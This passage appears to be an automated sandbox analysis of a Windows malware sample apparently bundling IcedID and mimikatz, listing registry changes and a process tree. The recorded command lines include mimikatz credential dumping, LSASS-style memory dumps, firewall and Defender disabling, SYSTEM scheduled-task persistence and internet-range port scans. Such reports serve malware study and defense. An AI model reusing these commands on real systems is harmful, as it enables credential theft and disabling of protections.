  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | hmuzmiedp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | hmuzmiedp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | bbleyvb.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals | hmuzmiedp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | hmuzmiedp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | hmuzmiedp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | hmuzmiedp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | hmuzmiedp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | hmuzmiedp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | hmuzmiedp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | bbleyvb.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | bbleyvb.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | hmuzmiedp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | hmuzmiedp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | hmuzmiedp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | bbleyvb.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | bbleyvb.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | hmuzmiedp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | hmuzmiedp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | hmuzmiedp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | hmuzmiedp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | bbleyvb.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | hmuzmiedp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | hmuzmiedp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | hmuzmiedp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | hmuzmiedp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | hmuzmiedp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | hmuzmiedp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | hmuzmiedp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | hmuzmiedp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | hmuzmiedp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software | hmuzmiedp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | hmuzmiedp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | hmuzmiedp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | hmuzmiedp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | hmuzmiedp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | hmuzmiedp.exe

Modifies registry class 14 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ | bbleyvb.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
  pid | process
  1856 | bbleyvb.exe (64 identical entries)

Suspicious behavior: LoadsDriver 15 IoCs
Processes:
  pid | process
  660 | (process name blank in the report; 15 identical entries)

Suspicious behavior: RenamesItself 1 IoCs
Processes:
pid | process
1668 | 2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 1668 | 2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege | 4952 | bbleyvb.exe
Token: SeDebugPrivilege | 1856 | bbleyvb.exe
Token: SeDebugPrivilege | 4740 | vfshost.exe
Token: SeDebugPrivilege | 1292 | hmuzmiedp.exe
Token: SeLockMemoryPrivilege | 872 | ecfkkq.exe
Token: SeLockMemoryPrivilege | 872 | ecfkkq.exe
Token: SeDebugPrivilege | 3944 | hmuzmiedp.exe
Token: SeDebugPrivilege | 4860 | hmuzmiedp.exe
Token: SeDebugPrivilege | 776 | hmuzmiedp.exe
Token: SeDebugPrivilege | 760 | hmuzmiedp.exe
Token: SeDebugPrivilege | 1276 | hmuzmiedp.exe
Token: SeDebugPrivilege | 2248 | hmuzmiedp.exe
Token: SeDebugPrivilege | 2448 | hmuzmiedp.exe
Token: SeDebugPrivilege | 920 | hmuzmiedp.exe
Token: SeDebugPrivilege | 1252 | hmuzmiedp.exe
Token: SeDebugPrivilege | 4652 | hmuzmiedp.exe
Token: SeDebugPrivilege | 2024 | hmuzmiedp.exe
Token: SeDebugPrivilege | 4640 | hmuzmiedp.exe
Token: SeDebugPrivilege | 5012 | hmuzmiedp.exe
Token: SeDebugPrivilege | 5060 | hmuzmiedp.exe
Token: SeDebugPrivilege | 2264 | hmuzmiedp.exe
Token: SeDebugPrivilege | 5540 | hmuzmiedp.exe
Token: SeDebugPrivilege | 4576 | hmuzmiedp.exe
-
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
pid | process
1668 | 2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe (recorded 2 times)
4952 | bbleyvb.exe (recorded 2 times)
1856 | bbleyvb.exe (recorded 2 times)
2508 | xohudmc.exe
3860 | tyxtue.exe
4224 | bbleyvb.exe (recorded 2 times)
6004 | bbleyvb.exe (recorded 2 times)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | source pid / process | target process
PID 1668 wrote to memory of 4260 | 1668 2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe | cmd.exe (recorded 3 times)
PID 4260 wrote to memory of 3832 | 4260 cmd.exe | PING.EXE (recorded 3 times)
PID 4260 wrote to memory of 4952 | 4260 cmd.exe | bbleyvb.exe (recorded 3 times)
PID 1856 wrote to memory of 3912 | 1856 bbleyvb.exe | cmd.exe (recorded 3 times)
PID 3912 wrote to memory of 4404 | 3912 cmd.exe | cmd.exe (recorded 3 times)
PID 3912 wrote to memory of 2332 | 3912 cmd.exe | cacls.exe (recorded 3 times)
PID 3912 wrote to memory of 4704 | 3912 cmd.exe | cmd.exe (recorded 3 times)
PID 3912 wrote to memory of 2384 | 3912 cmd.exe | cacls.exe (recorded 3 times)
PID 3912 wrote to memory of 4012 | 3912 cmd.exe | cmd.exe (recorded 3 times)
PID 3912 wrote to memory of 2996 | 3912 cmd.exe | cacls.exe (recorded 3 times)
PID 1856 wrote to memory of 2580 | 1856 bbleyvb.exe | netsh.exe (recorded 3 times)
PID 1856 wrote to memory of 2372 | 1856 bbleyvb.exe | netsh.exe (recorded 3 times)
PID 1856 wrote to memory of 4336 | 1856 bbleyvb.exe | netsh.exe (recorded 3 times)
PID 1856 wrote to memory of 2900 | 1856 bbleyvb.exe | cmd.exe (recorded 3 times)
PID 2900 wrote to memory of 4960 | 2900 cmd.exe | wpcap.exe (recorded 3 times)
PID 4960 wrote to memory of 4416 | 4960 wpcap.exe | net.exe (recorded 3 times)
PID 4416 wrote to memory of 4276 | 4416 net.exe | net1.exe (recorded 3 times)
PID 4960 wrote to memory of 1928 | 4960 wpcap.exe | net.exe (recorded 3 times)
PID 1928 wrote to memory of 2564 | 1928 net.exe | net1.exe (recorded 3 times)
PID 4960 wrote to memory of 1900 | 4960 wpcap.exe | net.exe (recorded 3 times)
PID 1900 wrote to memory of 916 | 1900 net.exe | net1.exe (recorded 3 times)
PID 4960 wrote to memory of 964 | 4960 wpcap.exe | net.exe
Processes
(indentation shows the parent/child depth of the process tree; "cmd:" is the recorded command line)

C:\Windows\System32\spoolsv.exe (PID 2152)
  cmd: C:\Windows\System32\spoolsv.exe
  C:\Windows\TEMP\urfucfzpe\ecfkkq.exe (PID 872)
    cmd: "C:\Windows\TEMP\urfucfzpe\ecfkkq.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\AppData\Local\Temp\2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe (PID 1668)
  cmd: "C:\Users\Admin\AppData\Local\Temp\2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe"
  - Drops file in Windows directory
  - Suspicious behavior: RenamesItself
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\cmd.exe (PID 4260)
    cmd: cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\kmydietv\bbleyvb.exe
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\PING.EXE (PID 3832)
      cmd: ping 127.0.0.1 -n 5
      - Runs ping.exe
    C:\Windows\kmydietv\bbleyvb.exe (PID 4952)
      cmd: C:\Windows\kmydietv\bbleyvb.exe
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx

C:\Windows\kmydietv\bbleyvb.exe (PID 1856)
  cmd: C:\Windows\kmydietv\bbleyvb.exe
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Sets file execution options in registry
  - Executes dropped EXE
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\cmd.exe (PID 3912)
    cmd: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe (PID 4404)
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe (PID 2332)
      cmd: cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    C:\Windows\SysWOW64\cmd.exe (PID 4704)
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe (PID 2384)
      cmd: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    C:\Windows\SysWOW64\cmd.exe (PID 4012)
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe (PID 2996)
      cmd: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  C:\Windows\SysWOW64\netsh.exe (PID 2580)
    cmd: netsh ipsec static del all
  C:\Windows\SysWOW64\netsh.exe (PID 2372)
    cmd: netsh ipsec static add policy name=Bastards description=FuckingBastards
  C:\Windows\SysWOW64\netsh.exe (PID 4336)
    cmd: netsh ipsec static add filteraction name=BastardsList action=block
  C:\Windows\SysWOW64\cmd.exe (PID 2900)
    cmd: cmd /c C:\Windows\nzlegstrv\yuiezklii\wpcap.exe /S
    - Suspicious use of WriteProcessMemory
    C:\Windows\nzlegstrv\yuiezklii\wpcap.exe (PID 4960)
      cmd: C:\Windows\nzlegstrv\yuiezklii\wpcap.exe /S
      - Drops file in Drivers directory
      - Executes dropped EXE
      - Loads dropped DLL
      - Drops file in System32 directory
      - Drops file in Program Files directory
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\net.exe (PID 4416)
        cmd: net stop "Boundary Meter"
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\net1.exe (PID 4276)
          cmd: C:\Windows\system32\net1 stop "Boundary Meter"
      C:\Windows\SysWOW64\net.exe (PID 1928)
        cmd: net stop "TrueSight Meter"
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\net1.exe (PID 2564)
          cmd: C:\Windows\system32\net1 stop "TrueSight Meter"
      C:\Windows\SysWOW64\net.exe (PID 1900)
        cmd: net stop npf
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\net1.exe (PID 916)
          cmd: C:\Windows\system32\net1 stop npf
      C:\Windows\SysWOW64\net.exe (PID 964)
        cmd: net start npf
        C:\Windows\SysWOW64\net1.exe (PID 4512)
          cmd: C:\Windows\system32\net1 start npf
  C:\Windows\SysWOW64\cmd.exe (PID 2164)
    cmd: cmd /c net start npf
    C:\Windows\SysWOW64\net.exe (PID 1016)
      cmd: net start npf
      C:\Windows\SysWOW64\net1.exe (PID 4760)
        cmd: C:\Windows\system32\net1 start npf
  C:\Windows\SysWOW64\cmd.exe (PID 1888)
    cmd: cmd /c net start npf
    C:\Windows\SysWOW64\net.exe (PID 4428)
      cmd: net start npf
      C:\Windows\SysWOW64\net1.exe (PID 4792)
        cmd: C:\Windows\system32\net1 start npf
  C:\Windows\SysWOW64\cmd.exe (PID 4044)
    cmd: cmd /c C:\Windows\nzlegstrv\yuiezklii\lcsfzibut.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\nzlegstrv\yuiezklii\Scant.txt
    C:\Windows\nzlegstrv\yuiezklii\lcsfzibut.exe (PID 4564)
      cmd: C:\Windows\nzlegstrv\yuiezklii\lcsfzibut.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\nzlegstrv\yuiezklii\Scant.txt
      - Executes dropped EXE
      - Loads dropped DLL
  C:\Windows\SysWOW64\cmd.exe (PID 3108)
    cmd: cmd /c C:\Windows\nzlegstrv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\nzlegstrv\Corporate\log.txt
    - Drops file in Windows directory
    C:\Windows\nzlegstrv\Corporate\vfshost.exe (PID 4740)
      cmd: C:\Windows\nzlegstrv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe (PID 4212)
    cmd: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mbybyunnc" /ru system /tr "cmd /c C:\Windows\ime\bbleyvb.exe"
    C:\Windows\SysWOW64\cmd.exe (PID 1620)
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\schtasks.exe (PID 2756)
      cmd: schtasks /create /sc minute /mo 1 /tn "mbybyunnc" /ru system /tr "cmd /c C:\Windows\ime\bbleyvb.exe"
      - Creates scheduled task(s)
  C:\Windows\SysWOW64\cmd.exe (PID 3088)
    cmd: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bbpdkeeml" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kmydietv\bbleyvb.exe /p everyone:F"
    C:\Windows\SysWOW64\cmd.exe (PID 4268)
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\schtasks.exe (PID 364)
      cmd: schtasks /create /sc minute /mo 1 /tn "bbpdkeeml" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kmydietv\bbleyvb.exe /p everyone:F"
      - Creates scheduled task(s)
  C:\Windows\SysWOW64\cmd.exe (PID 212)
    cmd: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "pbrbftibc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\urfucfzpe\ecfkkq.exe /p everyone:F"
    C:\Windows\SysWOW64\cmd.exe (PID 1424)
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\schtasks.exe (PID 1736)
      cmd: schtasks /create /sc minute /mo 1 /tn "pbrbftibc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\urfucfzpe\ecfkkq.exe /p everyone:F"
      - Creates scheduled task(s)
  C:\Windows\SysWOW64\netsh.exe (PID 5020)
    cmd: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  C:\Windows\SysWOW64\netsh.exe (PID 2796)
    cmd: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  C:\Windows\SysWOW64\netsh.exe (PID 4200)
    cmd: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  C:\Windows\SysWOW64\netsh.exe (PID 1696)
    cmd: netsh ipsec static set policy name=Bastards assign=y
  C:\Windows\SysWOW64\netsh.exe (PID 3584)
    cmd: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  C:\Windows\SysWOW64\netsh.exe (PID 4236)
    cmd: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe (PID 1292)
    cmd: C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 780 C:\Windows\TEMP\nzlegstrv\780.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\netsh.exe (PID 2388)
    cmd: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  C:\Windows\SysWOW64\netsh.exe (PID 776)
    cmd: netsh ipsec static set policy name=Bastards assign=y
  C:\Windows\SysWOW64\netsh.exe (PID 60)
    cmd: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  C:\Windows\SysWOW64\netsh.exe (PID 1648)
    cmd: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  C:\Windows\SysWOW64\netsh.exe (PID 2492)
    cmd: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe (PID 3944)
    cmd: C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 1020 C:\Windows\TEMP\nzlegstrv\1020.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\netsh.exe (PID 4680)
    cmd: netsh ipsec static set policy name=Bastards assign=y
  C:\Windows\SysWOW64\cmd.exe (PID 4220)
    cmd: cmd /c net stop SharedAccess
    C:\Windows\SysWOW64\net.exe (PID 1644)
      cmd: net stop SharedAccess
      C:\Windows\SysWOW64\net1.exe (PID 1620)
        cmd: C:\Windows\system32\net1 stop SharedAccess
  C:\Windows\SysWOW64\cmd.exe (PID 4224)
    cmd: cmd /c netsh firewall set opmode mode=disable
    C:\Windows\SysWOW64\netsh.exe (PID 1564)
      cmd: netsh firewall set opmode mode=disable
      - Modifies Windows Firewall
  C:\Windows\SysWOW64\cmd.exe (PID 4788)
    cmd: cmd /c netsh Advfirewall set allprofiles state off
    C:\Windows\SysWOW64\netsh.exe (PID 1736)
      cmd: netsh Advfirewall set allprofiles state off
      - Modifies Windows Firewall
  C:\Windows\SysWOW64\cmd.exe (PID 3088)
    cmd: cmd /c net stop MpsSvc
    C:\Windows\SysWOW64\net.exe (PID 4060)
      cmd: net stop MpsSvc
      C:\Windows\SysWOW64\net1.exe (PID 2952)
        cmd: C:\Windows\system32\net1 stop MpsSvc
  C:\Windows\SysWOW64\cmd.exe (PID 1964)
    cmd: cmd /c net stop WinDefend
    C:\Windows\SysWOW64\net.exe (PID 4644)
      cmd: net stop WinDefend
      C:\Windows\SysWOW64\net1.exe (PID 4484)
        cmd: C:\Windows\system32\net1 stop WinDefend
  C:\Windows\SysWOW64\cmd.exe (PID 1660)
    cmd: cmd /c net stop wuauserv
    C:\Windows\SysWOW64\net.exe (PID 4952)
      cmd: net stop wuauserv
      C:\Windows\SysWOW64\net1.exe (PID 4040)
        cmd: C:\Windows\system32\net1 stop wuauserv
  C:\Windows\SysWOW64\cmd.exe (PID 1068)
    cmd: cmd /c sc config MpsSvc start= disabled
    C:\Windows\SysWOW64\sc.exe (PID 3492)
      cmd: sc config MpsSvc start= disabled
      - Launches sc.exe
  C:\Windows\SysWOW64\cmd.exe (PID 1464)
    cmd: cmd /c sc config SharedAccess start= disabled
    C:\Windows\SysWOW64\sc.exe (PID 4512)
      cmd: sc config SharedAccess start= disabled
      - Launches sc.exe
  C:\Windows\SysWOW64\cmd.exe (PID 180)
    cmd: cmd /c sc config WinDefend start= disabled
    C:\Windows\SysWOW64\sc.exe (PID 1048)
      cmd: sc config WinDefend start= disabled
      - Launches sc.exe
  C:\Windows\SysWOW64\cmd.exe (PID 1960)
    cmd: cmd /c sc config wuauserv start= disabled
    C:\Windows\SysWOW64\sc.exe (PID 4464)
      cmd: sc config wuauserv start= disabled
      - Launches sc.exe
  C:\Windows\TEMP\xohudmc.exe (PID 2508)
    cmd: C:\Windows\TEMP\xohudmc.exe
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetWindowsHookEx
  C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe (PID 4860)
    cmd: C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 2152 C:\Windows\TEMP\nzlegstrv\2152.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe (PID 776)
    cmd: C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 2552 C:\Windows\TEMP\nzlegstrv\2552.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe (PID 760)
    cmd: C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 2764 C:\Windows\TEMP\nzlegstrv\2764.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe (PID 1276)
    cmd: C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 2844 C:\Windows\TEMP\nzlegstrv\2844.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe (PID 2248)
    cmd: C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 3100 C:\Windows\TEMP\nzlegstrv\3100.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe (PID 2448)
    cmd: C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 3844 C:\Windows\TEMP\nzlegstrv\3844.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe (PID 920)
    cmd: C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 3980 C:\Windows\TEMP\nzlegstrv\3980.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe (PID 1252)
    cmd: C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 4052 C:\Windows\TEMP\nzlegstrv\4052.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe (PID 4652)
    cmd: C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 2192 C:\Windows\TEMP\nzlegstrv\2192.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe (PID 2024)
    cmd: C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 2740 C:\Windows\TEMP\nzlegstrv\2740.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe (PID 4640)
    cmd: C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 1952 C:\Windows\TEMP\nzlegstrv\1952.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe (PID 5012)
    cmd: C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 5076 C:\Windows\TEMP\nzlegstrv\5076.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe (PID 5060)
    cmd: C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 4488 C:\Windows\TEMP\nzlegstrv\4488.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe (PID 2264)
    cmd: C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 3852 C:\Windows\TEMP\nzlegstrv\3852.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe (PID 3712)
    cmd: cmd.exe /c C:\Windows\nzlegstrv\yuiezklii\scan.bat
    C:\Windows\nzlegstrv\yuiezklii\zbesiipnm.exe (PID 3044)
      cmd: zbesiipnm.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
      - Executes dropped EXE
      - Drops file in Windows directory
  C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe (PID 5540)
    cmd: C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 3712 C:\Windows\TEMP\nzlegstrv\3712.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe (PID 4576)
    cmd: C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 3560 C:\Windows\TEMP\nzlegstrv\3560.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe (PID 5196)
